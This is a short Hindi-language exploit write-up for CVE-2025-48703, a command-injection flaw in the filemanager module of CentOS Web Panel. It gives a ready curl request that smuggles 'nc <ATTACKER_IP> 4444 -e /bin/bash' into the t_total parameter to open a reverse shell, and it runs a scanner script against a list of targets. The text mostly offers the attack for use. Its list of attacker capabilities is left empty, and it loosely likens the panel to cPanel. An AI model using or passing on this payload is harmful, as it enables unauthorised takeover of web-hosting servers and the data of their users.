
सेंटओएस वेब पैनल में रिमोट कोड निष्पादन
CVE-2025-48703 एक वेब होस्टिंग नियंत्रण पैनल (जैसे, cPanel) के filemanager मॉड्यूल में एक रिमोट कोड निष्पादन (RCE) भेद्यता है। यह acc=changePerm फ़ंक्शन में अस्वच्छ इनपुट हैंडलिंग के कारण होता है, जो हमलावर को t_total पैरामीटर का उपयोग करके मनमाने सिस्टम कमांड इंजेक्ट और निष्पादित करने की अनुमति देता है।
यह भेद्यता हमलावरों को अनुमति देती है:
⚠️ यह हमला न्यूनतम प्रमाणीकरण के साथ, या कुछ कॉन्फ़िगरेशन में, बिना प्रमाणीकरण के भी किया जा सकता है।
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #सुनिश्चित करें कि targets.txt उसी निर्देशिका में है
Server: cwpsrv